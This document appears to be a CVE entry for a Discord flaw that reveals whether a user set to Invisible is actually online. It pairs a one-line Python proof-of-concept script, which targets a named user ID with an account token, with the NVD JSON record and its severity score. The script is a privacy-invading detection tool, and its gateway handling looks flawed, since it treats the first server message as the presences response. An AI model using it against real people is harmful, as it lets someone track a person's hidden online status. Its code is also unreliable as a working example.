CVE-2026-24332

import asyncio import websockets import json async def check_user_invisible_status(user_token: str, target_user_id: str): """ PoC for CVE-2026-24332: Discord Invisible Status Detection Bypass This demonstrates how to detect if a user is in Invisible status by checking if they appear in the presences array with 'status': 'offline' """ uri = "wss://gateway.discord.gg/?v=10&encoding=json" async with websockets.connect(uri) as websocket: # Step 1: Send Gateway Identify identify_payload = { "op": 2, "d": { "token": user_token, "properties": { "$os": "windows", "$browser": "Chrome", } } } await websocket.send(json.dumps(identify_payload)) # Step 2: Request Guild Presences presences_request = { "op": 14, "d": { "guild_id": "TARGET_GUILD_ID", "typing": True, "activities": True, "channels": {"TARGET_GUILD_ID": []} } } await websocket.send(json.dumps(presences_request)) # Step 3: Parse presences response response = await websocket.recv() data = json.loads(response) if "d" in data and "presences" in data["d"]: presences = data["d"]["presences"] # Check if target user is in presences array with 'offline' status for presence in presences: if presence["user"]["id"] == target_user_id: if presence.get("status") == "offline": print(f"[!] User {target_user_id} is likely INVISIBLE (not truly offline)") return True print(f"[*] User {target_user_id} appears to be truly offline") return False return None # Run the PoC asyncio.run(check_user_invisible_status("YOUR_TOKEN", "TARGET_USER_ID"))

{"cve": {"id": "CVE-2026-24332", "sourceIdentifier": "[email protected]", "published": "2026-01-22T08:16:00.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Discord through 2026-01-16 allows gathering information about whether a user's client state is Invisible (and not actually offline) because the response to a WebSocket API request includes the user in the presences array (with \"status\": \"offline\"), whereas offline users are omitted from the presences array. This is arguably inconsistent with the UI description of Invisible as \"You will appear offline.\""}, {"lang": "es", "value": "Discord hasta el 16 de enero de 2026 permite recopilar información sobre si el estado del cliente de un usuario es Invisible (y no realmente fuera de línea) porque la respuesta a una solicitud de API de WebSocket incluye al usuario en el array de presencias (con 'status': 'offline'), mientras que los usuarios fuera de línea son omitidos del array de presencias. Esto es discutiblemente inconsistente con la descripción de la interfaz de usuario de Invisible como 'Aparecerás fuera de línea'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://xmrcat.org/discord-invisibility-bypass", "source": "[email protected]"}]}}